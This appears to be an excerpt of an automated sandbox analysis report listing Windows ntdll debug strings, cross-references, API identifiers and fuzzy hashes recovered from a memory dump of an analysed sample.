                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01512624
                                                                  • @, xrefs: 0151259B
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01512498
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01512412
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015124C0
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01512602
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01512506
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0151261F
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015122E4
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01512409
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015125EB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                  • Instruction ID: c2a1732ac9a0f7517bdb6c4558ca02bbf24d2189d39e975171247d871cf68704
                                                                  • Opcode Fuzzy Hash: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                  • Instruction Fuzzy Hash: 09028FB1D002299BEF31DB54CC90B9EB7B8BB55704F1041DAE609AB251EB709F84CF69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                  • Instruction ID: 22d1dcfa56d317b8918360c9cef4ca587fc48ad00235cfa6b3bf73e81592caca
                                                                  • Opcode Fuzzy Hash: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                  • Instruction Fuzzy Hash: 1651F0715053019BD725CF59C848BABBBE8FF94358F58092EE999CB250E770E608C792
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  Strings
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01528B8F
                                                                  • VerifierDebug, xrefs: 01528CA5
                                                                  • VerifierFlags, xrefs: 01528C50
                                                                  • HandleTraces, xrefs: 01528C8F
                                                                  • VerifierDlls, xrefs: 01528CBD
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01528A3D
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01528A67
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014F9A11, 014F9A3A
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9A01
                                                                  • apphelp.dll, xrefs: 01496496
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F99ED
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F9A2A
                                                                  • LdrpInitShimEngine, xrefs: 014F99F4, 014F9A07, 014F9A30
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 01512165
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01512160, 0151219A, 015121BA
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01512180
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01512178
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0151219F
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015121BF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014DC6C3
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 015181E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 01518177, 015181EB
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01518181, 015181F5
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01518170
                                                                  • LdrpInitializeProcess, xrefs: 014DC6C4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  APIs
                                                                    • Part of subcall function 014E2DF0: LdrInitializeThunk.NTDLL ref: 014E2DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D74
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014D8421
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D855E
                                                                  • @, xrefs: 014D8591
                                                                  • LdrpInitializeProcess, xrefs: 014D8422
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015121D9, 015122B1
                                                                  • SXS: %s() passed the empty activation context, xrefs: 015121DE
                                                                  • .Local, xrefs: 014D28D8
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015122B6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  Strings
                                                                  • RtlDeactivateActivationContext, xrefs: 01513425, 01513432, 01513451
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0151342A
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01513456
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01513437
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01501028
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0150106B
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015010AE
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500FE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A992
                                                                  • LdrpDynamicShimModule, xrefs: 0150A998
                                                                  • apphelp.dll, xrefs: 014C2462
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 014B3255
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014B327D
                                                                  • HEAP: , xrefs: 014B3264
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A121
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0150A10F
                                                                  • LdrpCheckModule, xrefs: 0150A117
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 015182E8
                                                                  • Failed to reallocate the system dirs string !, xrefs: 015182D7
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 015182DE
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0155C1C5
                                                                  • PreferredUILanguages, xrefs: 0155C212
                                                                  • @, xrefs: 0155C1F1
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524888
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01524899
                                                                  • LdrpCheckRedirection, xrefs: 0152488F
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01522104
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 015220F3
                                                                  • LdrpInitializationFailure, xrefs: 015220FA
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  Strings
                                                                  • LdrResSearchResource Exit, xrefs: 014AAA25
                                                                  • LdrResSearchResource Enter, xrefs: 014AAA13
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  • API String ID: 0-197956300
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$MUI
                                                                  • API String ID: 0-17815947
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A063D
                                                                  • kLsE, xrefs: 014A0540
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 0-2547482624
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 014AA309
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 014AA2FB
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-2876891731
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0152895E
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Instruction ID: a0b6cbb689ecae1245a12a37a13e197580aa4f08733dbf1d2bbac02f5e38f469
                                                                  • Opcode Fuzzy Hash: 19eabd407cadc9272813bc720d83f5deeb68695c3144fd1275da36ef4c183cb1
                                                                  • Instruction Fuzzy Hash: FBB17370A002658BDB64CF59C890BAAB7B1EF54710F1485EED50EE73A1DB309D86CB60
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b10df1e01902998f91506be451a6826e116507aff8c2d3b94533a1250cb871e
                                                                  • Instruction ID: ffec5143946c829ebb35730854adab001fe5df8167faf4cae4040f6c67eaa9a9
                                                                  • Opcode Fuzzy Hash: 4b10df1e01902998f91506be451a6826e116507aff8c2d3b94533a1250cb871e
                                                                  • Instruction Fuzzy Hash: 77A10435E056159FEB32DB98C848BAEBFA4BB01B14F05012BEA11BF2E1D7749D41CB91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bcf54ca0f4f425019f22b469d38f119a1b35f9e4d422970d49dcf15a4f8ba424
                                                                  • Instruction ID: 8b1106a92101ad012445a50ea2498641dec74a04647444df4ef2a89b0721442e
                                                                  • Opcode Fuzzy Hash: bcf54ca0f4f425019f22b469d38f119a1b35f9e4d422970d49dcf15a4f8ba424
                                                                  • Instruction Fuzzy Hash: FBA11571B006169FEB25CF69C594BAAB7F0FF54305F00413AEA259B2A1DBB4E812CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2a12eb92a21259801476798c396b4577e8b6823e6d9b01f454f95612fabb60a
                                                                  • Instruction ID: 6a84d21389c41beb0dcb6b41e92fa4b71887b45b035422affe9fb8cd73771544
                                                                  • Opcode Fuzzy Hash: c2a12eb92a21259801476798c396b4577e8b6823e6d9b01f454f95612fabb60a
                                                                  • Instruction Fuzzy Hash: 55A1EB72A00212EFC722DF29D981B6ABBE9FF58304F05092DE5899F661C334ED01CB91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79699e76f112ffa3c1f9cda79d5f556998508d3fc25e8dac177115d950e43354
                                                                  • Instruction ID: 8fe52bc973370358008f271e4c34dc72adf5c170393386d4ffc2cd9b2eeae519
                                                                  • Opcode Fuzzy Hash: 79699e76f112ffa3c1f9cda79d5f556998508d3fc25e8dac177115d950e43354
                                                                  • Instruction Fuzzy Hash: EE91B472D00226AFDB15CF69D884BAEBFB5FF5A710F154159EA10AF391D734E9008BA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12681102b0aea4cfb0dbb20ee9902369d76d2eb2de83bfcc4309a69a105473fd
                                                                  • Instruction ID: bc141a6f1c4ff6fa16b815d8941c30b7e0d81bc7f765344f22ac217be07186da
                                                                  • Opcode Fuzzy Hash: 12681102b0aea4cfb0dbb20ee9902369d76d2eb2de83bfcc4309a69a105473fd
                                                                  • Instruction Fuzzy Hash: 84912531A00616CBDB259B99C4C0BFE7BA1FF94714F05446AE905AF3A5E738D902C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 588e4573613f2c9456c83f3362f1460f34ab2ee3fccfd09759603725dd66d38f
                                                                  • Instruction ID: 20a5fa1b5f18bcfef69051d8cdae476da4d12dc2de1481796575c9192345da32
                                                                  • Opcode Fuzzy Hash: 588e4573613f2c9456c83f3362f1460f34ab2ee3fccfd09759603725dd66d38f
                                                                  • Instruction Fuzzy Hash: 2C8180B1A0061A9BDB24CF69C940ABEBBF9FB48700F05852FE545D7750E334D941CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                  • Instruction ID: 8b1cbea710bcc9071ca5ca1b32b70d52009987779bf2f4e45981f66d8ce65fa6
                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                  • Instruction Fuzzy Hash: E5816071A002069FDF19CF59C890AAEBBFABF94310F14856DD916AF355DB34D901CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4fbca9bbf25b1b8398159618b0a2c6e7d34f1089bbef0a6cf8c581b64982e934
                                                                  • Instruction ID: be1fc8da45205f24b96701113a3154e85d45b3f39b59d80641b54ff08f9c3744
